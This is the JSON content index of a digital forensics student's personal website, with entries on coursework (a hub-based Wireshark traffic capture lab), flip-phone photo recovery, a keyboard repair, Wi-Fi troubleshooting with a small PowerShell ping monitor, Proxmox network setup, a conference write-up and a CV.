2025","externalUrl":null,"permalink":"/tags/classwork/","section":"Tags","summary":"","title":"Classwork","type":"tags"},{"content":"In Fall 2024, I was enrolled in two Masters level Digital Forensics Classes; DFOR 660 and DFOR 510. DFOR 660 is all about what evidence there is to extract over a network; and how you can actually accomplish that. DFOR 510 is the basics of digital forensics. We cover a wide range of topics, such as write-blocking, forensic sanitizing, chain of custody, legal precedent and processes, memory forensics; and much, much more.\nIn DFOR 510, my required programs are: FTK Imager, a forensic case creation and analysis tool, PyCharm Community Edition to write python, Redline, an endpoint security tool that does memory and file analysis for Indicators Of Compromise (IOCs) and HxD, a hex editor to inspect the lower-level data on a storage medium such as a flash storage or Hard Drive.\nFall 2024 Spring 2025 Fall 2025 Spring 2026 DFOR 660, Network Forensics DFOR 661, Digital Media Forensics DFOR 710, Fraud Analytics DFOR 767, Penetration Testing in Digital Forensics DFOR 510, Digital Forensics Analysis DFOR 664, Incident Response Forensics DFOR 670, Mobile Device Forensics DFOR 772, Forensic Artifact Extraction DFOR 761, Malware Reverse Engineering DFOR 790, Advanced Digital Forensics ","date":"20 August 2025","externalUrl":null,"permalink":"/classwork/digital-forensics-classes/","section":"Classwork","summary":"","title":"Digital Forensics Classes","type":"classwork"},{"content":"A few weeks ago, I had the pleasure of performing a lab in my network forensics class dealing with the collection of network traffic through the use of a layer 1 hub. For anyone who is unsure what that might look like, here is a photo of a comparable unit to the one I used in the lab:\nA Netgear ethernet hub What separates this hub from the modern switches of today is that while switches manage their network traffic thorough the use of MAC addresses, a hub does not. It simply replicates traffic to all connected ports. This was used in networks of old to create hub-and-spoke networks; but of course this has the unintended side effect of allowing other machines on your network to record information meant for a different computer. On the right side of the hub, you see a button labeled normal/uplink. This has the effect of allowing the port on the rightmost side of the hub to connect 2 similar devices, performing the functionality of a crossover wire.\nThis is a network diagram of the typical classroom wiring at GMU. The goal of the lab was to intercept the network traffic of the target computer and to demonstrate this through a wireshark packet capture that showed the Layer 3 traffic with the IP address of the target computer. I plugged the collection computer into the uplink port with uplink mode enabled, and plugged the target computer into one of the other ports. I was able to see in wireshark the IP of the target computer and I was able to see both the websites that the target was visiting through the dns display filter in wireshark, and was also able to spy on unencrypted HTTP traffic.\nThis is what the network looked like when I had connected the hub. This lab was a really cool look at practical packet capture and helped me understand the practicality of an old school hub in network capture. Although there are a number of shortcomings with the approach (namely the need for a wired connection and the 100 Mbps bandwith limit.) Overall, I really enjoyed this lab and cannot wait for the next one.\n","date":"5 November 2024","externalUrl":null,"permalink":"/classwork/network-capture-lab/","section":"Classwork","summary":"","title":"Network Capture Lab","type":"classwork"},{"content":"My mom had an old flip phone that she wanted the pictures recovered from. As best as I could tell from booting the phone on, it was dead. No matter, FTK imager to the rescue!\nI wrote a small python script that looked for pictures in 3 formats, JPEG/JPG, PNG, and GIF files. It went through the disk image bit by bit (which was itself a bit-by-bit copy of the phone\u0026rsquo;s memory) looking for the magic numbers indicative of a picture. Two good resources that list file magic numbers are:\nWikipedia link FileSig link While I did create a python script at Github Link, I was having some issues extracting pictures. The issue I was having is that my script for some reason was interpreting multiple 0xFFD9 sequences where I only expected there to be one. I could spend time fixing my script, but there could have been other issues with the script that I wasn\u0026rsquo;t aware of, and I didn\u0026rsquo;t want to risk missing some of the information, or possibly corrupting pictures. (As a side note, I could have always done another copy from the phone\u0026rsquo;s memory, and the python script wasn\u0026rsquo;t writing to the disk image, so I am more worried here about image fidelity and accuracy, as opposed to a loss of the data)\nGiven this, I decided to just leave my python script as a learning project and to use a popular open source tool named Autopsy. It was able to recover more types of data than I coded for in my python script, and gave a nice structured output that looked like this:\nThe Autopsy output, with a sample image file selected. You can see that these files are marked to be deleted by the file system but they were recovered. All said and done, I recovered 85 photos, and was able to give them to my mom!\n","date":"11 September 2024","externalUrl":null,"permalink":"/misc/phone-recovery/","section":"Miscellaneous","summary":"","title":"Phone Recovery","type":"misc"},{"content":"","date":"29 August 2024","externalUrl":null,"permalink":"/tags/hardware/","section":"Tags","summary":"","title":"Hardware","type":"tags"},{"content":"","date":"29 August 2024","externalUrl":null,"permalink":"/projects/home-server/","section":"Projects","summary":"","title":"Home Server","type":"projects"},{"content":"A couple years ago, I bought a new keyboard. A Keychron K10, to be exact. I chose that model because it was a full size keyboard, including both a function key row and a number pad.\nWhen I first bought the keyboard, it worked great! It was replacing a corsair K55 that had become too “gamery” for my tastes. The K10 came with a mechanical switch, comparable to a cherry MX Red. I thought that would still be too loud, so I purchased the silent switches and planned to replace them. After I replaced the switches, I noticed that my 9 key on my number pad was not working. Oh well, I didn’t use that key very often anyway; or so I thought.\nAfter about a year and a half of owning the keyboard, the c key also stopped working. That was a bigger issue. Supposedly you don’t know what you have until it’s gone, and I noticed very quickly. Not only is the letter c used for about 2.8% of all words Wikipedia, but it’s also used by me, and most people, commonly for ctrl+c to copy. Not only could I not copy/paste with my keyboard (nothing a macro for my mouse wouldn’t fix), but I also had to dedicate my copy buffer to the letter c so that I could paste it with ctrl+v. To say it was infuriating was an understatement.\nI reached a point with my that to type the letter c on my other computers, I would reflexively reach for ctrl+v. This persisted for the better part of 3 months. I told myself that I would fix it or buy a new keyboard, and simply threw it on the pile of things I had to do.\nWell, today was the day. I finally had enough of pasting the letter c.\nThe first thing I did was to research how you should take apart the keyboard. Keychron has some pretty good documentation available on their website, linked here.\nI first took off the keycaps. Then, I took off the switches. After I took off the switches off, I replaced the hot swappable PCB socket that connect the switch pins on both the C key and the 9 key. Previous Next Then I reassembled the rest of the keyboard. Previous Next Update as of 9/24/2024: The C key is now working intermittently. The 9 key is fine, but I am at a loss as to why I’ve been having so many troubles with this key. I am going to replace the switch and socket one last time, and if doing that/opening the keyboard up again doesn’t fix it, I will be buying a new keyboard. Preferably a steelseries.\nUpdate as of 12/2024: I ended up replacing the keyboard with a Steelseries Apex 3. It was a great choice.\n","date":"29 August 2024","externalUrl":null,"permalink":"/misc/keyboard-repair/","section":"Miscellaneous","summary":"","title":"Keyboard Repair","type":"misc"},{"content":" 2026 \u003c?xml version=\"1.0\" encoding=\"utf-8\"?\u003e\rForensics Capstone Project Coming in May 2026 2025 Hugo Website Rambling about the design of my website and the shift from WordPress. 2024 Homelab Reverse Proxy routing \u0026#43; SSO \u0026#43; SSL \u0026#43; hosting as many of my own services as possible. What could go wrong? 2021 \u003c?xml version=\"1.0\" encoding=\"utf-8\"?\u003e\rAppalachian Trail Thru Hike 2,190 miles of rain, mud, and mountains; in pictures and words! (This content doesn't exist yet... coming soon!)\r","date":"29 August 2024","externalUrl":null,"permalink":"/projects/","section":"Projects","summary":"","title":"Projects","type":"projects"},{"content":"","date":"29 August 2024","externalUrl":null,"permalink":"/tags/proxmox/","section":"Tags","summary":"","title":"Proxmox","type":"tags"},{"content":"I kept having intermittent issues with my wifi where the connections would spontaneously lose connection to the internet, sometimes for up to a minute at a time. There was no predictable pattern, thus making it hard to isolate (in hindsight, I should\u0026rsquo;ve been checking router logs. Oh well!). One of the isolation steps I tried was to substitute in another router for the ISP-provided one. This proved to work for a time, until it happened again. I vowed to myself that I would fully get to the bottom of this later, when I had more time.\nOne night, I was SSH\u0026rsquo;ing into my debian proxmox VM and the connection kept dropping. After about the second time, I wanted to see if this was an issue connecting to the internet, or just something internal. For refrence, I was connected using Wifi, and the homelab is connected with a Cat 6e cable. Everything after that is virtual networking in proxmox. See that here. so what I ended up doing was running from my Windows machine a ping -8 8.8.8.8 and I noticed that a single ping request dropped after a few minutes at the same time as my SSH session closed abruptly. Okay, so now what?\nI was very confused at this point, unsure whether the issue was internal or external. If the issue was the router, shouldn\u0026rsquo;t swapping it have helped? If the issue was outside of my home network, (such as an upstream demand issue, or potentially hardware issue with the home connection) then why was my SSH dropping to an internal server? It made no sense. Finally, after peeking throught the router logs, I think I found the candidiate.\n2025 Sep 6 20:52:01 arc_wlsta_monitor info [WIFI.6][SYS]BSS=ath1 ACTION=disassociate, BSSID=[REDACTED], PHY RATE=1 Mbps, TXOP=76, STA=[REDACTED], RSSI=0, RATE=0 Mbps 2025 Sep 6 20:51:56 arc_wlsta_monitor info [WIFI.6][SYS]BSS=ath1 ACTION=associate, BSSID=[REDACTED], PHY RATE=72 Mbps, TXOP=83, STA=[REDACTED], RSSI=-71, RATE=2 Mbps As much as I love with all my heart watching cmd ping replies scroll by, I couldn\u0026rsquo;t take it anymore so I crafted up a quick little script:\n$lastOk = Get-Date ping -t [REDACTED] | ForEach-Object { if ($_ -match \u0026#34;Request timed out\u0026#34;) { $time = Get-Date -Format \u0026#34;yyyy-MM-dd HH:mm:ss\u0026#34; Write-Host \u0026#34;$time ALERT: $_\u0026#34; -ForegroundColor Red } else { # Every 5 minutes, print a heartbeat if ((Get-Date) -gt $lastOk.AddMinutes(5)) { $time = Get-Date -Format \u0026#34;yyyy-MM-dd HH:mm:ss\u0026#34; Write-Host \u0026#34;$time Looks good\u0026#34; -ForegroundColor Green $lastOk = Get-Date } } } ","date":"29 August 2024","externalUrl":null,"permalink":"/misc/troubleshooting-wifi-interference/","section":"Miscellaneous","summary":"","title":"Troubleshooting Wifi Interference","type":"misc"},{"content":"\rI am a computer and cybersecurity nerd who knows just enough to be dangerous. I am passionate about password managers, self-hosting, and open source software. This website is a place for me to demonstrate some of the technologies that I\u0026rsquo;ve worked with, and to house documentation of my projects.\nCurrently, I attend George Mason University. I have received an undergraduate degree in Cybersecurity, and I am currently a graduate candidiate of Digital Forensics. I can be found spending my time analyzing disk images, spinning up virtual machines, or tinkering with some new technology. I am currently learning to reverse engineer malware, and analyzing novel artifacts found from AI-integrated browsers.\nAreas of Interest include: # Malware Analysis (Static \u0026amp; Dynamic) Reverse Engineering (Hardware/Software) Open source software Password managers Some of my most commonly used tools are: # Virtualization Forensics Misc Languages Windows Subsystem for Linux Docker VMware VirtualBox Proxmox Autopsy Remnux HxD DBViewer for SQLite ALEAPP Hugo (what this site is built using) Cloudflare Zero Trust \u0026amp; Tunnels SQLite Python C Powershell Bash In my free time, I like to read, hike, bike, and play board games with my family. I\u0026rsquo;ve hiked the entirety of the 2,200 mile Appalachian trail, and plan to complete more thru-hikes.\nHere is the link to my current CV.\n","date":"19 August 2024","externalUrl":null,"permalink":"/about/","section":"Welcome to my website!","summary":"","title":"About Me","type":"page"},{"content":"I was given a ticket to MITRE ATT\u0026CK con 5. This is my writeup. Previous Next I haven\u0026rsquo;t yet decided if I like the carousel above or image gallery below more. Let me know what you think!\n“Visibility without actionability is an expensive waste of time” # -Allie Mellen # I haven\u0026rsquo;t yet mustered up the effort to finish writing this part up yet, but it is on my shortlist. # As part of my undergraduate program, I had a class where I was required to attend a professional networking event. I was fortunately one of the two students who was given a pass to the MITRE ATT\u0026amp;CK Con 5.0. Most of my experience with the attack framework was with my internship, where I used it to map cyber security objectives to business functions. At this conference I was able to hear from a few different speakers who talked about the direction of SoC and detection engineering work, giving me a executive level glimpse into the security career I was hoping to join.\nThe first person to speak was a woman named Allie Mellen. As someone who had a background in advising executives responsible for SOC\u0026rsquo;s, she understood the problems facing modern SOC\u0026rsquo;s. Her main issue was that SOC\u0026rsquo;s are not automated because of their set of limited rules and constraints for software that hackers try to sidestep. She also talked about how SoC analysts generally had a hard time advancing in their career because while in their work they were focused primarily on closing tickets and it was difficult as a result to get a progression with respect to their job responsibilities. She also talks about how SoC teams are overwhelmed because there is too much data there are too many tools and there are too many analytics. She talked about how a more sustainable model for SOC\u0026rsquo;s is to switch to a detection engineering approach where there is an agile approach to building a response playbook. This encourages detection engineering, which furthers and refines the skill set of each individual SoC analyst. She talked also about how SOC\u0026rsquo;s can be lured into a false sense of confidence through an overwhelming amount of metrics that might not always be indicative of a real success or failure.\n","date":"19 August 2024","externalUrl":null,"permalink":"/networking-events/mitre-attck/","section":"Networking Events","summary":"","title":"MITRE ATT\u0026CK Con 5.0","type":"networking-events"},{"content":"","date":"14 January 2024","externalUrl":null,"permalink":"/tags/self-hosting/","section":"Tags","summary":"","title":"Self Hosting","type":"tags"},{"content":"This is what it is like for the \u0026lsquo;small\u0026rsquo; process of getting a home server up and running. Strap in, this is a long one. # When I was 15, I built myself my first gaming computer. At the time, it had great hardware. An almost top of the line GTX 1070, an i7-6700k, and 32 GB of ram. What more could a kid in high school ask for? It was able to handle modern gaming demands for about 7 years before the cracks started to show, so I had to upgrade. When I did that, I was left with the old chassis, hard drives, CPU, and a few other miscellaneous components. I did not have a plan what to do with it, so the components sat in a closet for a few years.\nSome time later, in my community college education, I was introduced to the idea of self-hosted services. The idea of having your own server where photos are accessible to the internet, your own custom home automation server, a server for your camera recordings to live, a recipe hosting website; the possibilities were endless. This realization occured around the time that I was learning about virtualization, and my love for a home server was born!\nOf course, it took some time until I had created the first iteration. My intital steps were not virtualized, memory hogs, and not well configured. I did have a working setup though. Eventually, the upkeep of the already deprecated software became too much for me (along with data loss concerns!) and so I shut the project down.\nIn 2024, I purchased a Dell Optiplex 3050. It was formerly a corporate thin client. The reason I chose this computer for my home hosting is because I wanted something small, quiet, and with minimal energy drain. Since measuring (while idling), I have recorded approximately a 5w power draw from the wall. Not bad! One of the first things I did after I bought the computer was upgrad both the memory and storage capacity. Next, I installed proxmox, a type 2 hypervisor. That process that had many bumps along the road. While setup guides did exist, I had modifications I wanted to make and still a rudimentary understanding of SSL certs, Linux networking, when to use an LXC container vs a VM, et cetera.\nThe learning curve to create this tech stack was quite steep, but eventually the day finally arrived that I told myself I would sit down and finish setting up my server. I had been having persistent issues with getting access for a few days before school took over and I had to put it on the back burner. The first issue was that I was not able to access the web-based GUI to create any virtual machines. For this, I first changed from a wireless connection for the server to a wired connection. That did not resolve my issue, so I assumed there was an issue with the IP distribution. To fix this, I went into the /etc/network/interfaces file. It took me a while to understand what the function was of the vmbr0 adapter, which is to create a bridge for the VMs to connect to. It took even longer and more trial and error before I had the ports set up correctly as you can see by my hastily commented lines below.\nI do not have a “before” version, but this is what it looks like after a result of my tinkering:\niface lo inet loopback\r#iface wlp2s0 inet manual\rauto enp1s0\riface enp1s0 inet manual\r# address 192.168.1.56\r# gateway 192.168.1.1\rauto vmbr0\riface vmbr0 inet static\raddress 192.168.1.57\rgateway 192.168.1.1\rbridge-ports enp1s0\rbridge-stp off\rbridge-fd 0\rsource /etc/network/interfaces.d/* This helped me confirm layer 3 access to the server by using ping, but I still had the issue of actually getting to the management portal.\nAfter some time reading online about it, I saw some forum discussions mentioning that it might have been an issue with the certificates. I doubted that, as I wasn’t able to get access over HTTP, but at that time, I had tried a lot of potential solutions and I figured it wouldn’t hurt. So I ran the following commands:\nThe portal still wasn’t accessible. To verify the port was open, I used the command ss -ln, which returns some pretty ugly output:\nss -ln output So, I used grep to filter for the numbers 8006 to verify that it was actually open and listening for traffic. I thought that was strange, and that I should be able to see the management portal..? So I ran systemctl to see what the status was and got back this:\nsystemctl output Obviously, something was wrong with the parent pve-cluster service on the host. So I shut it down and used journalctl to find out what was wrong. I found out after some extensive googling, forum reading, and poring over the documentation (this is a case of RTFM) that if there were any files existing at /etc/pve, the service would fail to start because the virtual file system could not be mounted. So I ran the following commands:\nLo and behold, I was able to start the service and access the web interface. This was an excellent way to get familar with the virtual networking systems used in proxmox, as well as the linux filesystem and general command line usage. Now, onto the fun parts: hosting virtual services!\n","date":"14 January 2024","externalUrl":null,"permalink":"/projects/home-server/1/","section":"Projects","summary":"","title":"Self-Hosting introduction","type":"projects"},{"content":" The Trail Provides. ","date":"29 August 2021","externalUrl":null,"permalink":"/projects/at-hike/","section":"Projects","summary":"","title":"Appalachian Trail Thru Hike","type":"projects"},{"content":"","externalUrl":null,"permalink":"/authors/","section":"Authors","summary":"","title":"Authors","type":"authors"},{"content":"\r🛰️Networking→\rEvents, takeaways, and contacts from meetups and conferences.\n📚Classwork→\rNotes, labs, and write‑ups from courses.\n🧰Projects→\rBuild logs, case studies, and demos.\n🎖️Certifications→\rExam prep, notes, and results.\n🧩Miscellaneous→\rEverything that doesn’t fit neatly elsewhere.\n","externalUrl":null,"permalink":"/categories/","section":"Welcome to my website!","summary":"","title":"Categories","type":"page"},{"content":"\rContact Me\rYour email:\rYour message:\rSend ","externalUrl":null,"permalink":"/contact/","section":"Welcome to my website!","summary":"","title":"Contact","type":"page"},{"content":"Download PDF CV\nSummary # Cybersecurity and digital forensics graduate student with hands-on experience in vulnerability assessment, firewall management, automated pentesting administration, and technical security research. Currently seeking roles in Digital Forensics \u0026amp; Incident Response.\nExperience # Cybersecurity Project Lead \u0026ndash; JSI Telecom # Jan. 2026 - May 2026\nCybersecurity Intern \u0026ndash; US House of Representatives # Oct. 2025 - Jan. 2026\nCybersecurity Intern \u0026ndash; Vicinity Energy # May 2024 - May 2025\nDesigned and implemented an organization-wide host-based firewall using Crowdstrike Falcon. Created custom powershell scripts for patch management across 700+ endpoints with an RMM tool. Improved detections/alerting workflows in endpoint security tooling. Detected an insider threat and created a report for senior management. Education # M.S. in Digital Forensics, Concentration in Pentesting \u0026amp; Reverse Engineering # George Mason University\nMay 2026\nB.A.S. in Cybersecurity # School name\nGraduation\nCertifications # CompTIA Security+ \u0026ndash; Obtained October 2025 Comptia CySA+ \u0026ndash; Estimated: June 2026 Skills # Security: vulnerability assessment, firewall administration, network analysis, malware analysis\nTools: Wireshark, Kali Linux, Pentera, Docker, Proxmox\nSystems: Debian, Linux administration, virtualization, scripting\nLanguages: Python, Bash, PowerShell\nProjects # Project Name # Short description of what it does, what you built, and the key technologies.\nProject Name # Short description.\nLinks # GitHub: https://github.com/writeblocked LinkedIn: https://linkedin.com/in/hiller-hoover Website: https://hhoover.net ","externalUrl":null,"permalink":"/resume/","section":"Welcome to my website!","summary":"A summary of my IT, cybersecurity, and digital forensics experience.","title":"CV","type":"page"},{"content":" What is a \u0026ldquo;now\u0026rdquo; page? # A now page shares what you’d tell a friend you hadn’t seen in a year. Inspired by Derek Sivers I\u0026rsquo;ve graduated from GMU with my masters and gotten an Incident Response role at IBM! Life is great for me at the moment. I\u0026rsquo;ll be going to Norway to see my girlfriend for 2 months this summer, and I don\u0026rsquo;t begin my job until late September.\nHere are my current short-term goals:\nGraduate with my Master\u0026rsquo;s degree in Digital Forensics (May 2026) Finish updating this website Complete my upcoming sprint triathalon on June 8th Get the Security+ Get the CYSA+ Secure a job after my degree Last updated: May 21st, 2026 # ","externalUrl":null,"permalink":"/now/","section":"Welcome to my website!","summary":"","title":"Now","type":"page"}]